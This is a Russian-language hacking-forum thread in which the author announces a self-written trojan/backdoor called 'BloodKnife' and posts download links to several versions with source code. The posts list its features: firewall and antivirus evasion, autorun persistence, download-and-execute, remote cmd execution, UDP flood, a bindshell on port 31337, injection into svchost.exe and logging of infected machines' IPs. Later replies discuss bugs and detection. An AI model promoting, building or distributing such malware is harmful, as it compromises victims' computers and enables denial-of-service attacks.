Вот, наконец то появилось время дописать. Итак, описание: 1)Есть какой-никакой обход фаеров(переписаный _dkcs_ddos_bot`овский). 2)SDT restore(обход проактивок). 3)Инжектом опять не получилось. 4)Копируется в системную диру, пишется в автозагрузку. Функции: 1)Отправка месаги юзеру. 2)просмотр содержимого файла. 3)Download && Execute. 4)Открыть\закрыть cd-rom. 5)Разные игры с панелькой винды, нажатие кнопки пуск. 6)Выполнение команд в cmd. 7)UDP Flood(!). 8)Выключение виря. Правда вес подкачал - 60кб. Управляется через клиент. Ну, думаю такому монстру нужно дать имя. Назвал BloodKnife. Думаю сделать web-админку. Но это в лучше случае осенью. Ну и самое главное - с исходниками! Скачать: http://lordofring.tushino.com/BloodKnife_v1.0.rar http://softz.ifolder.ru/2420331 http://http://rapidshare.com/files/38282705/BloodKnife_v1.0.rar.html [update] Версия 1.4 +Добавлен отстук по стату. IP заражённых компов пишется в лог. http://lordofring.tushino.com/BloodKnife.v.1.4.rar - c исходниками ________________________ Версия 1.3 +bindshell на 31337 порту +вес 16кб. +инжект в svchost.exe +меньше палева +функции все теже, клиент юзать тотже. http://lordofring.tushino.com/BK.v.1.3.rar
Удавалось. Но работает он криво. Инжект не пашет.В некоторые функции вызываю переполнение буфера. Биндшелл пашет, но тяжело и там в коде goto .illusion_bot в 100 раз лучше.
Ну вот, уже версия 1.1 +Добавлен bindshell на 31337`атом порту(через telnet). +Вес сокращён до 56кб. Клиент юзать тот же. Скачать: http://lordofring.tushino.com/BK1.1.rar
А вот и версия 1.2 +Меньше палева. +Я таки сделал инжект в svchost! http://lordofring.tushino.com/BKv.1.2.rar - вместе с исходниками новых функций. P.S. я смотрю народу вирь не понравился...[хнык-хнык]
vii Рас тебе надо то и исправляй сам благо исходники есть. А Ky3bMu4 может щяс другим занят. И если он перестанет палится то это на неделю максимум!
